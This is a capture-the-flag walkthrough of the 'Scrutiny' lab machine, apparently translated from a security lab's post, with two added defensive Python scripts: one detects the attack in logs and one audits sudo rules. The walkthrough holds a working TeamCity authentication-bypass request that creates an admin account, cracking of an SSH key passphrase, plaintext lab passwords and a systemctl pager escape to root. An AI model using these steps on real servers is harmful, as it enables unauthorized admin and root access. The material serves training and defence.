Information gathering:
root@iZt4nbifrvtk7cy11744y4Z:~# nmap -p- -Pn -A -sS -T4 192.168.216.91
Starting Nmap 7.80 ( https://nmap.org ) at 2025-02-25 18:38 CST
Nmap scan report for 192.168.216.91
Host is up (0.0034s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: onlyrands.com, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING,
| ssl-cert: Subject: commonName=onlyrands.com
| Subject Alternative Name: DNS:onlyrands.com
| Not valid before: 2024-06-07T09:33:24
|_Not valid after: 2034-06-05T09:33:24
|_ssl-date: TLS randomness does not represent time
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: OnlyRands
443/tcp closed https
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%), Linux 3.7 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: onlyrands.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 2.17 ms 192.168.45.1
2 2.19 ms 192.168.45.254
3 3.82 ms 192.168.251.1
4 3.96 ms 192.168.216.91
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.98 seconds
Port 80 is running an HTTP service.
Clicking Login redirects to teams.onlyrands.com; add a hosts entry resolving that name, then click Login again.
Send a request to add a user:
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: teams.onlyrands.com
Content-Type: application/json
{"username": "test", "password": "test", "email": "[email protected]","roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
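The request above has two tell-tale features a defender can key on in the reverse proxy's access log: the target ends in a `;.jsp` suffix that makes the server treat it like a static resource, and the `jsp` query parameter points at an internal REST endpoint under /app/rest/. The following Python script is an added detection example, not part of the original write-up; it scans nginx "combined" log lines for those two signals. The log lines are constructed samples, and the confidence scoring and the `/app/rest/` prefix check are my own assumptions about what is worth alerting on.

```python
"""Flag TeamCity authentication-bypass style requests in nginx access logs.

Added defensive example (not from the original write-up). Two signals are
checked per request target:
  1. the target ends in a ';.<ext>' static-looking suffix (e.g. ';.jsp');
  2. a 'jsp' query parameter points under /app/rest/.
Both together is a high-confidence match; one alone is flagged for review,
because a lone ';.ext' suffix can occur in unusual but legitimate URLs.
"""
import re
from urllib.parse import urlsplit, unquote

# nginx 'combined' format: ip - user [ts] "METHOD target PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# ';' followed by a static-looking extension at the very end of the target
STATIC_SUFFIX_RE = re.compile(r";[^/?]*\.(?:jsp|css|js|png|gif|ico|html?)$", re.IGNORECASE)

# Assumption: any jsp= value under this prefix is an internal REST endpoint
REST_PREFIX = "/app/rest/"

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = """\
192.168.45.200 - - [25/Feb/2025:18:41:07 +0800] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 512 "-" "python-requests/2.31"
192.168.45.200 - - [25/Feb/2025:18:41:09 +0800] "GET /login.html HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Feb/2025:18:42:00 +0800] "GET /app/rest/users HTTP/1.1" 401 120 "-" "curl/8.0"
10.0.0.7 - - [25/Feb/2025:18:43:30 +0800] "GET /res/app.css;.jsp HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_values(query, key):
    """Return the decoded values of `key` from a raw query string.

    Done by hand rather than with parse_qs so that ';' inside a value is
    never treated as a pair separator (older Python versions did that).
    """
    values = []
    for pair in query.split("&"):
        k, _, v = pair.partition("=")
        if k == key:
            values.append(unquote(v))
    return values


def classify(target):
    """Return the list of reasons this request target looks like the bypass pattern."""
    reasons = []
    if STATIC_SUFFIX_RE.search(target):
        reasons.append("target ends in a ';.<ext>' static-looking suffix")
    parts = urlsplit(target)
    for value in query_values(parts.query, "jsp"):
        endpoint = value.split(";")[0]  # strip any trailing ';.jsp' from the value
        if endpoint.startswith(REST_PREFIX):
            reasons.append("jsp= parameter redirects to " + endpoint)
    return reasons


def scan(lines):
    """Scan an iterable of log lines; return one finding per suspicious request."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec["target"])
        if not reasons:
            continue
        findings.append({
            "ip": rec["ip"],
            "method": rec["method"],
            "target": rec["target"],
            "status": rec["status"],
            "confidence": "high" if len(reasons) >= 2 else "review",
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"[{f['confidence']}] {f['ip']} {f['method']} {f['target']} -> {f['status']}: "
              + "; ".join(f["reasons"]))
```

On the sample above the first line is reported as a high-confidence match (both signals) and the `/res/app.css;.jsp` line is flagged for review; the plain unauthenticated `GET /app/rest/users` that returns 401 is ordinary behaviour and is not reported. The HTTP status is carried into the finding deliberately: a 200 on a match like the first line means the bypass succeeded and the users list should be checked for accounts that nobody created.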
Log in successfully with test/test, then search for vulnerabilities.
Every exploitation attempt failed, even after switching between many exploits.
While browsing files in the admin backend, I found a private key file.
First convert it with ssh2john:
ssh2john id_rsa > hash.txt
Then crack it with john:
john hash.txt --wordlist=~/rockyou.txt
The passphrase is cheer. Log in over SSH as the user marcot (this private key was modified by marcot).
Upload and run linpeas.sh; it reports a lot of mail.
Running cat * on the mail directly reveals a user credential: IdealismEngineAshen476
Switch to the matthewa user successfully.
There is a hidden file in that user's home directory.
It contains another password: RefriedScabbedWasting502
In /etc/passwd, find the user that corresponds to Dach: briand
Switch successfully; this user's home directory is /home/administration/briand.
The user can run /usr/bin/systemctl status teamcity-server.service via sudo without a password.
Run:
sudo /usr/bin/systemctl status teamcity-server.service
Then type !sh in the pager that opens.
Obtain the proof and local flags.
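The final step works because a sudo rule for `systemctl status` hands the user an interactive pager running as root, and the pager can spawn a shell. The Python script below is an added hardening example, not part of the original write-up: it audits sudoers-style lines for commands that page their output (or are pagers themselves) and proposes an exact-argument rule with `--no-pager`, which sudo then enforces because a rule with arguments only matches that exact command line. The sudoers lines are constructed samples modelled on the rule in the walkthrough; the lists of paging verbs and pager binaries are my assumptions and can be extended.

```python
"""Audit sudoers rules for commands that can drop the caller into a pager.

Added defensive example (not from the original write-up). Parses a small,
constructed sudoers fragment and flags rules like the one in the walkthrough:
`NOPASSWD: /usr/bin/systemctl status <unit>` opens less as root unless the
rule pins `--no-pager`. Relying on SYSTEMD_PAGER/PAGER from the caller's
environment is not enough, because sudo's default env_reset strips them.
"""
import re
import shlex

# systemctl verbs whose output goes through a pager when stdout is a TTY (assumed list)
PAGING_VERBS = {"status", "show", "cat", "list-units", "list-unit-files",
                "list-timers", "list-dependencies"}
# Binaries that are pagers or always page their output (assumed list)
PAGER_BINARIES = {"/usr/bin/less", "/usr/bin/more", "/usr/bin/man", "/usr/bin/journalctl"}

# who host=(runas) [TAG: ...] cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)

# Constructed sample; the first rule mirrors the one found on the box
SAMPLE_SUDOERS = """\
# constructed sample, not a real sudoers file
Defaults env_reset
briand ALL=(root) NOPASSWD: /usr/bin/systemctl status teamcity-server.service
ops ALL=(root) /usr/bin/systemctl restart teamcity-server.service
ops ALL=(root) NOPASSWD: /usr/bin/systemctl status teamcity-server.service --no-pager
backup ALL=(root) NOPASSWD: /usr/bin/journalctl -u teamcity-server.service
"""


def parse_rule(line):
    """Parse one user-specification line; return None for comments, Defaults, blanks."""
    line = line.strip()
    if not line or line.startswith("#") or line.startswith("Defaults"):
        return None
    m = RULE_RE.match(line)
    if not m:
        return None
    return {
        "who": m.group("who"),
        "host": m.group("host"),
        "runas": m.group("runas") or "root",
        "nopasswd": "NOPASSWD:" in m.group("tags"),
        "cmds": [c.strip() for c in m.group("cmds").split(",")],
    }


def pager_risk(cmd):
    """Return (reason, suggested_fix) if the command spec can reach a pager, else None."""
    if cmd == "ALL":
        return ("unrestricted ALL", "replace with an explicit command list")
    argv = shlex.split(cmd)
    if not argv:
        return None
    binary, args = argv[0], argv[1:]
    if binary in PAGER_BINARIES:
        return (f"{binary} is a pager or pages its output",
                "remove the rule or wrap the command so it cannot spawn a shell")
    if binary.endswith("/systemctl"):
        if not args:
            return ("systemctl with any arguments (status, show, ... page through less)",
                    "pin the verb and unit, and append --no-pager")
        verb = next((a for a in args if not a.startswith("-")), None)
        if verb in PAGING_VERBS and "--no-pager" not in args:
            return (f"systemctl {verb} pages through less unless --no-pager is given",
                    cmd + " --no-pager")
    return None


def audit(lines):
    """Return one finding per risky command across all parsable rules."""
    findings = []
    for line in lines:
        rule = parse_rule(line)
        if rule is None:
            continue
        for cmd in rule["cmds"]:
            risk = pager_risk(cmd)
            if risk:
                findings.append({"who": rule["who"], "runas": rule["runas"],
                                 "nopasswd": rule["nopasswd"], "cmd": cmd,
                                 "reason": risk[0], "fix": risk[1]})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDOERS.splitlines()):
        tag = "NOPASSWD " if f["nopasswd"] else ""
        print(f"{f['who']} -> ({f['runas']}) {tag}{f['cmd']}\n  risk: {f['reason']}\n  fix:  {f['fix']}")
```

On the sample, the briand rule and the journalctl rule are reported; the restart rule and the status rule that already carries `--no-pager` are not. The proposed fix for the first rule is the same command with `--no-pager` appended, which is exactly what the user must then type for sudo to accept it.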
Originally published on the WeChat official account EuSRC安全实验室 (EuSRC Security Lab): PG_Scrutiny